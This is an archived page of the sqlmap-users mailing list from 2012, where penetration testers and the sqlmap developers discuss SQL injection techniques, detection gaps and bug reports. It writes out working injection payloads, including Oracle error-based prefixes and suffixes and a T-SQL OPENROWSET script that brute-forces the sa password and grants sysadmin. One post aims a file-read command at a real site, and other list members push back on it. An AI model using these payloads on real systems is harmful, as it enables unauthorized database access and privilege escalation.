sqlmap-users Mailing List for sqlmap (Page 52)
Brought to you by:
inquisb
From: Chris O. <chr...@gm...> - 2012-08-03 16:37:31
Thanks Miroslav, I'll give it a go!

On 3 August 2012 16:15, Miroslav Stampar <mir...@gm...> wrote:

> Hi Chris.
>
> In those kind of cases UNION injection should be a solution.
>
> As LIMIT doesn't accept subquery as an operand you have to append a UNION
> ALL SELECT to the original value (foo in your case) and necessarily add a
> comment to the end (e.g. --) to neutralize that second operand of affected
> LIMIT part.
>
> To make it short, LIMIT doesn't accept subqueries and standard non-UNION
> based injection techniques should fail (as they "seed" their payload into
> the affected SQL form - in this case LIMIT).
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm...> wrote:
>
>> Hi All
>>
>> I have found that an application has a rewritten URL element that ends up
>> in a SQL query. The error message tells me that I'm injecting into the
>> LIMIT number at the end of the query. This appears to be the only point of
>> injection for now.
>>
>> A simplified version of the query that's being injected into is:
>>
>> SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
>> created_date DESC LIMIT foo, 10
>>
>> 'foo' is my injection and of course gives a syntax error.
>>
>> I know that apostrophes/ticks (as in the ' character) are blocked as a
>> minimum.
>>
>> Does anyone have any experience injecting this late in a query? Any
>> ideas would be greatly received.
>>
>> Regards
>>
>> Chris
>
> --
> Miroslav Stampar
> http://about.me/stamparm

From: D A. <je...@ho...> - 2012-08-03 16:37:25
Hi, I'm trying to run sqlmap from msf but I keep getting this error: the sqlmap script could not be found. I've already added the sqlmap path to the system Path environment, but I'm still getting this error. Can you tell me what I can do from here? Thank you!

From: Miroslav S. <mir...@gm...> - 2012-08-03 15:15:18
Hi Chris.

In those kind of cases UNION injection should be a solution.

As LIMIT doesn't accept subquery as an operand you have to append a UNION ALL SELECT to the original value (foo in your case) and necessarily add a comment to the end (e.g. --) to neutralize that second operand of affected LIMIT part.

To make it short, LIMIT doesn't accept subqueries and standard non-UNION based injection techniques should fail (as they "seed" their payload into the affected SQL form - in this case LIMIT).

Kind regards,
Miroslav Stampar

On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm...> wrote:

> Hi All
>
> I have found that an application has a rewritten URL element that ends up
> in a SQL query. The error message tells me that I'm injecting into the
> LIMIT number at the end of the query. This appears to be the only point of
> injection for now.
>
> A simplified version of the query that's being injected into is:
>
> SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
> created_date DESC LIMIT foo, 10
>
> 'foo' is my injection and of course gives a syntax error.
>
> I know that apostrophes/ticks (as in the ' character) are blocked as a
> minimum.
>
> Does anyone have any experience injecting this late in a query? Any ideas
> would be greatly received.
>
> Regards
>
> Chris

--
Miroslav Stampar
http://about.me/stamparm

From: Chris O. <chr...@gm...> - 2012-08-03 14:08:41
Hi All

I have found that an application has a rewritten URL element that ends up in a SQL query. The error message tells me that I'm injecting into the LIMIT number at the end of the query. This appears to be the only point of injection for now.

A simplified version of the query that's being injected into is:

SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC, created_date DESC LIMIT foo, 10

'foo' is my injection and of course gives a syntax error.

I know that apostrophes/ticks (as in the ' character) are blocked as a minimum.

Does anyone have any experience injecting this late in a query? Any ideas would be greatly received.

Regards

Chris

From: M Z. <rob...@gm...> - 2012-08-02 11:18:04
I often redirect sqlmap output to a text file with the command >, and that leaves annoying marks like [0m [31m at the beginning and the end of lines, and I have to clean that out. Is there a way to disable output coloring?

From: Miroslav S. <mir...@gm...> - 2012-07-30 11:14:41
Hi Jorge.

Dennis is right. Posting real targets on this ML is considered inappropriate.

In your case you are most probably having problems with backend DBMS permissions as in majority of similar cases. In such cases switches -t and/or --parse-errors are great for debugging purposes.

Kind regards,
Miroslav Stampar

On Mon, Jul 30, 2012 at 8:59 AM, Dennis <kor...@ya...> wrote:

> Hi Jorge,
>
> please do not post any vulnerabilities of real web pages to the mailing
> list. Could get you or anyone replying into trouble.
>
> Cheers,
> Dennis

--
Miroslav Stampar
http://about.me/stamparm

From: Dennis <kor...@ya...> - 2012-07-30 06:59:59
Hi Jorge,

please do not post any vulnerabilities of real web pages to the mailing list. Could get you or anyone replying into trouble.

Cheers,
Dennis

From: Jorge V. <jv...@co...> - 2012-07-30 02:53:35
Hi, great tool.

I could never read or write a file on the server, I don't know why. For example this vulnerable web:

python sqlmap.py -u "http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL" --file-read "/www/redpat.tv/htdocs/php/multimedia/p3.php" -v 5

It returns the error:

/www/redpat.tv/htdocs/php/multimedia/p3.php file saved to: 'None'

If you go to: http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL' you can see selecting to see the text, that the path on the server is right, thanks to the error message.

Hope you can help me, thanks.

Jorge Vespa
COTASnet
3862818
Santa Cruz - Bolivia

From: Miroslav S. <mir...@gm...> - 2012-07-29 15:34:50
Hi.

Thank you for your report and find it fixed with the latest commit [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/126

On Sat, Jul 28, 2012 at 1:33 PM, M Zverev <rob...@gm...> wrote:

> [15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-dba0a96
> Python version: 2.7.3
> Operating system: nt
> Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u *************************************** -D ****** -T *********** --dump
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
>     start()
>   File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in start
>     action()
>   File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action
>     conf.dbmsHandler.dumpTable()
>   File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, in dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue
>     value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
>   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in unionUse
>     value = __oneShotUnionUse(expression, unpack)
>   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in __oneShotUnionUse
>     if kb.chars.stop not in page and kb.chars.stop[:-1] in page:
> TypeError: argument of type 'NoneType' is not iterable

--
Miroslav Stampar
http://about.me/stamparm

From: M Z. <rob...@gm...> - 2012-07-28 11:34:21
[15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-dba0a96
Python version: 2.7.3
Operating system: nt
Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u *************************************** -D ****** -T *********** --dump
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
    start()
  File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in start
    action()
  File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action
    conf.dbmsHandler.dumpTable()
  File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, in dumpTable
    entries = inject.getValue(query, blind=False, dump=True)
  File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue
    value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
  File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in unionUse
    value = __oneShotUnionUse(expression, unpack)
  File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in __oneShotUnionUse
    if kb.chars.stop not in page and kb.chars.stop[:-1] in page:
TypeError: argument of type 'NoneType' is not iterable

From: Miroslav S. <mir...@gm...> - 2012-07-28 09:56:27
Hi.

We have something similar already covered, but your payload is original for sure. We'll probably include it as a standard one. Will let you know.

Kind regards,
Miroslav Stampar

On Thu, Jul 26, 2012 at 11:02 AM, whp <wh...@po...> wrote:

> Hi list/developer
>
> I stumbled over this type of injection while doing a pentest and thought of
> implementing this kind of injection in sqlmap (I call it
> "error-based-blind-injection"):
>
> The Webapp replied with "success", if the statement was correct,
> regardless of the number of returned rows (the rows actually were fetched
> in a subsequent request). And with an empty response, if the statement
> failed. So the attack was identified the following way (It is an Oracle DB):
>
> param=' and to_char(1/0) like '1 --> empty response because 1/0 is a division by zero error
> param=' and to_char(1/1) like '1 --> success
>
> Now I had to find a workaround to get sqlmap to identify this injection (it
> only identified a time based blind, but I wanted a _fast_ attack)
>
> My solution:
> prefix= ' and to_char(1/(case (select 'a' from dual where 1=1
> suffix= ) when 'a' then '1' else '0' end)) like '1
>
> Now my question: is it possible to get this attack in sqlmap as a standard
> attack - or is there an easier way to configure sqlmap?
>
> Additionally the oracle -"order by" clause injection via a case-statement
> would be interesting.
>
> Your opinions/suggestions?
>
> Chris
> --
> whp_at_pohlcity_dot_de

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-07-27 08:56:41
Hi Daniel.

This is most probably because "Hebrew" was not recognized as a proper charset there, hence proper decoding could not be done.

Could you please send more information (maybe in private)? Traffic file (-t traffic.txt) could be enough.

Kind regards,
Miroslav Stampar

On Fri, Jul 27, 2012 at 7:48 AM, Daniel Shapira <don...@gm...> wrote:

> hey,
> I have a strange problem on data retrieving with Microsoft SQL Server -
> error based.
> I use this command:
>
> python sqlmap.py --risk=3 --level=5 -u "www.test.com" -p x --threads=10 --dump-all --random-agent -o --flush-session --technique=EUS
>
> Now some of the data is good,
> but parts of some data come out like this:
>
> [08:46:23] [INFO] retrieved: \\xe2\\xec\\xe9\\xf7\\xf1\\xe1\\xf8\\xe2
>
> I should point out that the site is in Hebrew,
> so the data may also be Hebrew, so I assumed that maybe the terminal can't
> display it, but it is the same in the log files.
> What can be the problem?
> thanks

--
Miroslav Stampar
http://about.me/stamparm

From: Daniel S. <don...@gm...> - 2012-07-27 05:49:04
hey,
I have a strange problem on data retrieving with Microsoft SQL Server - error based.
I use this command:

python sqlmap.py --risk=3 --level=5 -u "www.test.com" -p x --threads=10 --dump-all --random-agent -o --flush-session --technique=EUS

Now some of the data is good, but parts of some data come out like this:

[08:46:23] [INFO] retrieved: \\xe2\\xec\\xe9\\xf7\\xf1\\xe1\\xf8\\xe2

I should point out that the site is in Hebrew, so the data may also be Hebrew, so I assumed that maybe the terminal can't display it, but it is the same in the log files.
What can be the problem?
thanks

From: whp <wh...@po...> - 2012-07-26 09:27:00
Hi list/developer

I stumbled over this type of injection while doing a pentest and thought of implementing this kind of injection in sqlmap (I call it "error-based-blind-injection"):

The Webapp replied with "success", if the statement was correct, regardless of the number of returned rows (the rows actually were fetched in a subsequent request). And with an empty response, if the statement failed. So the attack was identified the following way (It is an Oracle DB):

param=' and to_char(1/0) like '1 --> empty response because 1/0 is a division by zero error
param=' and to_char(1/1) like '1 --> success

Now I had to find a workaround to get sqlmap to identify this injection (it only identified a time based blind, but I wanted a _fast_ attack)

My solution:
prefix= ' and to_char(1/(case (select 'a' from dual where 1=1
suffix= ) when 'a' then '1' else '0' end)) like '1

Now my question: is it possible to get this attack in sqlmap as a standard attack - or is there an easier way to configure sqlmap?

Additionally the oracle -"order by" clause injection via a case-statement would be interesting.

Your opinions/suggestions?

Chris
--
whp_at_pohlcity_dot_de

From: Dennis <kor...@ya...> - 2012-07-25 12:17:29
Hey,

haven't spent any thinking on a generic approach yet as I was on an Oracle DBMS and did fine. But I see your point... I will give it a thought...

Cheers,
Dennis

On 25.07.2012 12:09, Miroslav Stampar wrote:

> Hi again.
>
> Most generic approach would be to use dummy prefix as "99999 WHERE
> 1=1", but there are lots of potential pitfalls here (e.g. if column
> name is delimited with a DBMS specific column name delimiter). We've
> added a new issue for this [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/120
>
> On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi.
>
> How would you exploit this:
>
> SELECT $_GET['id'] FROM table
>
> on all DBMSes?
>
> Oracle and MySQL have DUAL but what with others? At the end we'll
> end with 10 new payloads and/or boundaries each of those covering
> each DBMS.
>
> Kind regards,
> Miroslav Stampar
>
> On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote:
>
> I'm not sure about Troy, but I had a similar case recently. I
> could control the bit of the query between SELECT and FROM,
> which could be exploited either with nested (SELECT)s or by
> expanding the query with another FROM [...] UNION SELECT [...]
> to extend the query. SQLmap did not find the injection. The
> DBMS was Oracle.
>
> Cheers
>
> On 25.07.2012 00:48, Miroslav Stampar wrote:
>>
>> Hi Troy.
>>
>> More info is required for sure.
>>
>> You mean that you just need a (SELECT...)/subquery type of
>> injection? This is something that we are aware that we need
>> to do.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote:
>>
>> Evening all,
>>
>> I had an SQL injection into a MySQL5-based web
>> application the other week which involved me having
>> control over the column list being selected. I tried
>> sqlmap against the URL, but it didn't find the injection
>> point. I tried again, taking the --level and --risk a
>> little higher, but still nothing.
>>
>> In the end, I manually exploited it using a sub-select.
>> Was I doing something wrong with sqlmap, or will it not
>> identify injection points like that? I can provide an
>> example of the query the application was using if this helps.
>>
>> Regards,
>>
>> Matt
>
> --
> Miroslav Stampar
> http://about.me/stamparm

From: Bernardo D. A. G. <ber...@gm...> - 2012-07-25 10:44:39
Hi Juan,

master.dbo.xp_execresultset is a stored extended procedure available on Microsoft SQL Server 2000. It is not available on MSSQL 2005/2008 onwards by default, hence the error message and the DBA brute force attack fails.

Bernardo

On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:

> I was trying sqlninja.
>
> this is the query it use for bruteforce SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar
> (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37
> begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set
> @p=@p+@z set @q=N'select 1 from
> OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
> 1;exec master.dbo.sp_addsrvrolemember
> '''''+system_user+N''''',''''sysadmin'''' '')' exec
> master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> but I am receiving this error:
>
> Could not find stored procedure 'master.dbo.xp_execresultset'.
>
> it was in the HTTP response. this error is because the "openrowset" is
> disable? or is just that the "SA" password is not the correct. (like
> "password wrong" error).
>
> there is any way to check if "openrowset" is enable?
>
> thanks.
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
>>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by thereforce, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > there is a way for bruteforce the SA password using SQL INJECTION?
>> >
>> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
>> > access to the internet (it has the 1433 port blocked),
>> > the current user is a normal user (low privileges User). cannot get SA
>> > hash password.
>> >
>> > the question is, is there any tool or code or way to bruteforce the SA
>> > password? without direct access to the Sql Server?
>> >
>> > It is a request for add this functionality to SQLMAP, I don't know if is
>> > possible.
>> >
>> > Thanks.
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

From: Miroslav S. <mir...@gm...> - 2012-07-25 10:10:04
Hi again.

Most generic approach would be to use dummy prefix as "99999 WHERE 1=1", but there are lots of potential pitfalls here (e.g. if column name is delimited with a DBMS specific column name delimiter). We've added a new issue for this [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/120

On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi.
>
> How would you exploit this:
>
> SELECT $_GET['id'] FROM table
>
> on all DBMSes?
>
> Oracle and MySQL have DUAL but what with others? At the end we'll end with
> 10 new payloads and/or boundaries each of those covering each DBMS.
>
> Kind regards,
> Miroslav Stampar
>
> On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote:
>
>> I'm not sure about Troy, but I had a similar case recently. I could
>> control the bit of the query between SELECT and FROM, which could be
>> exploited either with nested (SELECT)s or by expanding the query with
>> another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not
>> find the injection. The DBMS was Oracle.
>>
>> Cheers
>>
>> On 25.07.2012 00:48, Miroslav Stampar wrote:
>>
>> Hi Troy.
>>
>> More info is required for sure.
>>
>> You mean that you just need a (SELECT...)/subquery type of injection?
>> This is something that we are aware that we need to do.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote:
>>
>>> Evening all,
>>>
>>> I had an SQL injection into a MySQL5-based web application the other
>>> week which involved me having control over the column list being selected.
>>> I tried sqlmap against the URL, but it didn't find the injection point. I
>>> tried again, taking the --level and --risk a little higher, but still
>>> nothing.
>>>
>>> In the end, I manually exploited it using a sub-select. Was I doing
>>> something wrong with sqlmap, or will it not identify injection points like
>>> that? I can provide an example of the query the application was using if
>>> this helps.
>>>
>>> Regards,
>>>
>>> Matt
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-07-25 09:47:55
Hi.

How would you exploit this:

SELECT $_GET['id'] FROM table

on all DBMSes?

Oracle and MySQL have DUAL but what with others? At the end we'll end with 10 new payloads and/or boundaries each of those covering each DBMS.

Kind regards,
Miroslav Stampar

On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote:

> I'm not sure about Troy, but I had a similar case recently. I could
> control the bit of the query between SELECT and FROM, which could be
> exploited either with nested (SELECT)s or by expanding the query with
> another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not
> find the injection. The DBMS was Oracle.
>
> Cheers
>
> On 25.07.2012 00:48, Miroslav Stampar wrote:
>
> Hi Troy.
>
> More info is required for sure.
>
> You mean that you just need a (SELECT...)/subquery type of injection? This
> is something that we are aware that we need to do.
>
> Kind regards,
> Miroslav Stampar
>
> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote:
>
>> Evening all,
>>
>> I had an SQL injection into a MySQL5-based web application the other
>> week which involved me having control over the column list being selected.
>> I tried sqlmap against the URL, but it didn't find the injection point. I
>> tried again, taking the --level and --risk a little higher, but still
>> nothing.
>>
>> In the end, I manually exploited it using a sub-select. Was I doing
>> something wrong with sqlmap, or will it not identify injection points like
>> that? I can provide an example of the query the application was using if
>> this helps.
>>
>> Regards,
>>
>> Matt

--
Miroslav Stampar
http://about.me/stamparm

From: Dennis <kor...@ya...> - 2012-07-25 09:28:37
|
I'm not sure about Troy, but I had a similar case recently. I could control the bit of the query between SELECT and FROM, which could be exploited either with nested (SELECT)s or by expanding the query with another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not find the injection. The DBMS was Oracle.

Cheers

On 25.07.2012 00:48, Miroslav Stampar wrote:

> Hi Troy.
>
> More info is required for sure.
>
> You mean that you just need a (SELECT...)/subquery type of injection? This is something that we are aware that we need to do.
>
> Kind regards,
> Miroslav Stampar
>
> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote:
>
> Evening all,
>
> I had an SQL injection into a MySQL5-based web application the other week which involved me having control over the column list being selected. I tried sqlmap against the URL, but it didn't find the injection point. I tried again, taking the --level and --risk a little higher, but still nothing.
>
> In the end, I manually exploited it using a sub-select. Was I doing something wrong with sqlmap, or will it not identify injection points like that? I can provide an example of the query the application was using if this helps.
>
> Regards,
>
> Matt |
From: Chris O. <chr...@gm...> - 2012-07-25 09:16:00
|
Hi Juan

I'm not convinced it's due to either of your suggestions. If openrowset is disabled, you'll get an error message that begins something like:

SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' because this component is turned off as part of the security configuration for this server.

The statement that your instance of SQLNinja is sending out differs from mine (are you using -m b -w /path/to/wordlist.txt)? My queries look similar to this:

select * from OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=sa;pwd=passwordguess','waitfor delay ''0:0:59'';select 1;');--

If the sa password is incorrect, the error message should be along the lines of:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'sa'.

If the sa password is correct, then you'll get the appropriate delay and probably a 200 response (though not necessarily, but you'll definitely get the delay).

I'm guessing that your error message is something to do with user permissions for the DBMS, a quick Google seemed to suggest that, but I'm confident it has little to do with openrowset being disabled or an incorrect sa password.

I assume you have mixed mode authentication in place on SQL Server? You can check if openrowset is enabled using sp_configure, see the following link for more information:

http://social.msdn.microsoft.com/Forums/en/transactsql/thread/c3d3295b-933b-4ee8-934c-87c8d6a47260

Sorry to talk about a different SQL injection tool on this list. I would add that it'd be good to see some of the bits of SQLNinja functionality that are missing from SQLMap implemented in the future if it's not already planned (not that there's a lot of missing functionality).

Cheers

Chris

On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:

> I was trying sqlninja.
>
> This is the query it uses to brute-force the SA password with 1 character (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set @p=@p+@z set @q=N'select 1 from OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select 1;exec master.dbo.sp_addsrvrolemember '''''+system_user+N''''',''''sysadmin'''' '')' exec master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> But I am receiving this error:
>
> *Could not find stored procedure 'master.dbo.xp_execresultset'.*
>
> It was in the HTTP response. Is this error because "openrowset" is disabled? Or is it just that the "SA" password is not correct (like a "password wrong" error)?
>
> Is there any way to check if "openrowset" is enabled?
>
> Thanks.
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to query another DBMS (or the DBMS itself). Back in 2002 Chris Anley released a paper demonstrating how to abuse this function to perform a DBMS user's password brute-force attack within the MSSQL instance. A few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password brute-force attack. We have the required code in place, see issue #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL 2005 RTM it is disabled by thereforce, hence either the database administrator has manually enabled it, or you won't be able to abuse this function to brute-force the 'sa' (DBA) password hash or run statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > Is there a way to brute-force the SA password using SQL INJECTION?
>> >
>> > This is the scenario. It is a database server (SQL Server 2008) without access to the internet (it has the 1433 port blocked), the current user is a normal user (low-privileged user). Cannot get the SA password hash.
>> >
>> > The question is, is there any tool or code or way to brute-force the SA password without direct access to the SQL Server?
>> >
>> > It is a request to add this functionality to SQLMAP, I don't know if it is possible.
>> >
>> > Thanks.
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949) |
From: Miroslav S. <mir...@gm...> - 2012-07-24 22:48:45
|
Hi Troy.

More info is required for sure.

You mean that you just need a (SELECT...)/subquery type of injection? This is something that we are aware that we need to do.

Kind regards,
Miroslav Stampar

On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote:

> Evening all,
>
> I had an SQL injection into a MySQL5-based web application the other week which involved me having control over the column list being selected. I tried sqlmap against the URL, but it didn't find the injection point. I tried again, taking the --level and --risk a little higher, but still nothing.
>
> In the end, I manually exploited it using a sub-select. Was I doing something wrong with sqlmap, or will it not identify injection points like that? I can provide an example of the query the application was using if this helps.
>
> Regards,
>
> Matt |
From: Troy B <pow...@gm...> - 2012-07-24 21:17:38
|
Evening all,

I had an SQL injection into a MySQL5-based web application the other week which involved me having control over the column list being selected. I tried sqlmap against the URL, but it didn't find the injection point. I tried again, taking the --level and --risk a little higher, but still nothing.

In the end, I manually exploited it using a sub-select. Was I doing something wrong with sqlmap, or will it not identify injection points like that? I can provide an example of the query the application was using if this helps.

Regards,

Matt |
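The query shape discussed in this thread (request input placed between SELECT and FROM, as in SELECT $_GET['id'] FROM table), shown next to a placeholder and an allowlist, as an added example that is not code from any poster or from sqlmap. The SQLite schema, the data and all function names are constructed for the illustration.

```python
import sqlite3


def make_db():
    """Constructed sample schema and rows (not from the thread)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE users (name TEXT, password_hash TEXT);
        INSERT INTO posts VALUES (1, 'hello', 'first post');
        INSERT INTO users VALUES ('admin', 'constructed-hash-value');
    """)
    return db


def fetch_vulnerable(db, column):
    # Same shape as the thread's query: the request value is pasted between
    # SELECT and FROM, so the database parses it as SQL, not as data.
    return db.execute("SELECT " + column + " FROM posts").fetchall()


def fetch_bound(db, column):
    # Placeholders bind values only. The string comes back as a literal for
    # every row, so this is safe but cannot be used to choose a column.
    return db.execute("SELECT ? FROM posts", (column,)).fetchall()


# Request value -> identifier written by the application itself.
ALLOWED_COLUMNS = {"id": "id", "title": "title", "body": "body"}


def fetch_allowlisted(db, column):
    # Only identifiers from the fixed map ever reach the SQL text.
    try:
        identifier = ALLOWED_COLUMNS[column]
    except KeyError:
        raise ValueError("unknown column: %r" % (column,))
    return db.execute('SELECT "%s" FROM posts' % identifier).fetchall()


def demo():
    """Run one ordinary value and one sub-select through each variant."""
    db = make_db()
    subselect = "(SELECT password_hash FROM users)"  # constructed input
    try:
        rejected = fetch_allowlisted(db, subselect)
    except ValueError:
        rejected = "rejected"
    return {
        "vulnerable": fetch_vulnerable(db, subselect),
        "bound": fetch_bound(db, "title"),
        "allowlisted": fetch_allowlisted(db, "title"),
        "allowlisted_subselect": rejected,
    }
```

Because the injection point is an expression position rather than a quoted value, only the allowlist gives the application a working column selector that cannot carry a sub-select.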
From: juan m. <j.m...@gm...> - 2012-07-24 13:26:36
|
I was trying sqlninja.

This is the query it uses to brute-force the SA password with 1 character (numbers and letters).

declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set @p=@p+@z set @q=N'select 1 from OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select 1;exec master.dbo.sp_addsrvrolemember '''''+system_user+N''''',''''sysadmin'''' '')' exec master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1

But I am receiving this error:

*Could not find stored procedure 'master.dbo.xp_execresultset'.*

It was in the HTTP response. Is this error because "openrowset" is disabled? Or is it just that the "SA" password is not correct (like a "password wrong" error)?

Is there any way to check if "openrowset" is enabled?

Thanks.

On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <ber...@gm...> wrote:

> Hi Juan,
>
> Microsoft SQL Server has a built-in function called OPENROWSET to query another DBMS (or the DBMS itself). Back in 2002 Chris Anley released a paper demonstrating how to abuse this function to perform a DBMS user's password brute-force attack within the MSSQL instance. A few years later the attack has been automated in sqlninja[1].
> We have an issue open on GitHub[2] to implement the same DBA password brute-force attack. We have the required code in place, see issue #34[3] and will soon close the whole thing.
>
